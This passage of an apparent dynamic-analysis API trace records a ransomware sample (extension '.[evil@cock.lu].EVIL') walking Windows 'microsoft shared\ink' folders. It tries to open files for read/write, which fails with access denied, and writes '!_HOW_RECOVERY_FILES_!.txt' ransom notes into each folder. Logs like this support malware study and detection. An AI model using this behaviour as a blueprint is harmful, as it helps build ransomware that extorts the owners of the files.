shared\\ink\\pt-BR\\tipresx.dll.mui") returned 73 [0088.681] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.681] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.681] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 0x49 [0088.681] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.681] GetLastError () returned 0x5 [0088.681] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.681] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0088.681] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 0x39 [0088.681] strlen (_Str="${KEY}") returned 0x6 [0088.681] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.681] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.681] strlen (_Str="${CODE}") returned 0x7 [0088.681] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.681] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.681] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.681] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.682] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.682] __uncaught_exception () returned 0x84b1160800 [0088.682] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.682] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.682] wcsstr (_Str="pt-PT", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.682] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 57 [0088.682] wcscmp (_String1=".", _String2="pt-PT") returned -1 [0088.682] wcscmp (_String1="..", _String2="pt-PT") returned -1 [0088.682] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 0x39 [0088.682] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 0x0 [0088.682] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*" [0088.683] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0088.683] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\.") returned 59 [0088.683] wcscmp (_String1=".", _String2=".") returned 0 [0088.683] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.683] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\..") returned 60 [0088.683] wcscmp (_String1=".", _String2="..") returned -1 [0088.683] wcscmp (_String1="..", _String2="..") returned 0 [0088.683] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.683] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.683] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 73 [0088.683] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.683] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.683] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 0x49 [0088.683] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.684] GetLastError () returned 0x5 [0088.684] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.684] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0088.684] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 0x39 [0088.684] strlen (_Str="${KEY}") returned 0x6 [0088.684] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.684] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.684] strlen (_Str="${CODE}") returned 0x7 [0088.684] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.684] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.684] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.684] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.684] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.684] __uncaught_exception () returned 0x84b1160800 [0088.685] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.685] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.685] wcsstr (_Str="ro-RO", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.685] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 57 [0088.685] wcscmp (_String1=".", _String2="ro-RO") returned -1 [0088.685] wcscmp (_String1="..", _String2="ro-RO") returned -1 [0088.685] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 0x39 [0088.685] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 0x0 [0088.685] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*" [0088.685] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0088.686] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.686] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\.") returned 59 [0088.686] wcscmp (_String1=".", _String2=".") returned 0 [0088.686] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.686] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.686] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\..") returned 60 [0088.686] wcscmp (_String1=".", _String2="..") returned -1 [0088.686] wcscmp (_String1="..", _String2="..") returned 0 [0088.686] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.686] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.686] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 73 [0088.686] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.686] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.686] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 0x49 [0088.686] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.686] GetLastError () returned 0x5 [0088.686] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.686] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0088.686] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 0x39 [0088.686] strlen (_Str="${KEY}") returned 0x6 [0088.686] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.686] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.686] strlen (_Str="${CODE}") returned 0x7 [0088.686] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.686] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.686] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.686] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.687] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.687] __uncaught_exception () returned 0x84b1160800 [0088.687] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.687] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.687] wcsstr (_Str="rtscom.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.687] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 62 [0088.687] wcscmp (_String1="rtscom.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.687] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="rtscom.dll") returned 0x0 [0088.687] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 0x3e [0088.687] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.688] GetLastError () returned 0x5 [0088.688] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.688] wcsstr (_Str="ru-RU", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.688] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 57 [0088.688] wcscmp (_String1=".", _String2="ru-RU") returned -1 [0088.688] wcscmp (_String1="..", _String2="ru-RU") returned -1 [0088.688] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 0x39 [0088.688] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 0x0 [0088.688] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*" [0088.688] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dda40 [0088.688] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.688] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\.") returned 59 [0088.688] wcscmp (_String1=".", _String2=".") returned 0 [0088.688] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.688] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.688] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\..") returned 60 [0088.688] wcscmp (_String1=".", _String2="..") returned -1 [0088.688] wcscmp (_String1="..", _String2="..") returned 0 [0088.688] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.688] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.688] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 73 [0088.688] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.688] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.688] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 0x49 [0088.688] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.689] GetLastError () returned 0x5 [0088.689] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.689] FindClose (in: hFindFile=0x84b11dda40 | out: hFindFile=0x84b11dda40) returned 1 [0088.694] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 0x39 [0088.694] strlen (_Str="${KEY}") returned 0x6 [0088.695] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.695] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.695] strlen (_Str="${CODE}") returned 0x7 [0088.695] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.695] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.695] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.695] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.695] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.695] __uncaught_exception () returned 0x84b1160800 [0088.695] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.696] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.696] wcsstr (_Str="ShapeCollector.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.696] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 70 [0088.696] wcscmp (_String1="ShapeCollector.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.696] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ShapeCollector.exe") returned 0x0 [0088.696] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 0x46 [0088.696] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.696] GetLastError () returned 0x5 [0088.696] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.696] wcsstr (_Str="sk-SK", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.697] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 57 [0088.697] wcscmp (_String1=".", _String2="sk-SK") returned -1 [0088.697] wcscmp (_String1="..", _String2="sk-SK") returned -1 [0088.697] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 0x39 [0088.697] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 0x0 [0088.697] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*" [0088.697] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd440 [0088.697] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.697] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\.") returned 59 [0088.697] wcscmp (_String1=".", _String2=".") returned 0 [0088.697] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.697] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.697] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\..") returned 60 [0088.697] wcscmp (_String1=".", _String2="..") returned -1 [0088.697] wcscmp (_String1="..", _String2="..") returned 0 [0088.697] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.697] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.697] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 73 [0088.697] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.697] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.697] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 0x49 [0088.697] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.697] GetLastError () returned 0x5 [0088.697] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.697] FindClose (in: hFindFile=0x84b11dd440 | out: hFindFile=0x84b11dd440) returned 1 [0088.697] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 0x39 [0088.697] strlen (_Str="${KEY}") returned 0x6 [0088.697] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.697] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.698] strlen (_Str="${CODE}") returned 0x7 [0088.698] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.698] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.698] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.698] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.698] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.698] __uncaught_exception () returned 0x84b1160800 [0088.698] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.699] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.699] wcsstr (_Str="sl-SI", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.699] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 57 [0088.699] wcscmp (_String1=".", _String2="sl-SI") returned -1 [0088.699] wcscmp (_String1="..", _String2="sl-SI") returned -1 [0088.699] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 0x39 [0088.699] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 0x0 [0088.699] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*" [0088.699] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddc80 [0088.699] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.699] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\.") returned 59 [0088.699] wcscmp (_String1=".", _String2=".") returned 0 [0088.699] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.699] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.699] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\..") returned 60 [0088.699] wcscmp (_String1=".", _String2="..") returned -1 [0088.699] wcscmp (_String1="..", _String2="..") returned 0 [0088.699] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.699] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.699] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 73 [0088.700] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.700] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.700] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 0x49 [0088.700] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.700] GetLastError () returned 0x5 [0088.700] FindNextFileW (in: hFindFile=0x84b11ddc80, lpFindFileData=0x84b0fdda00 | out: 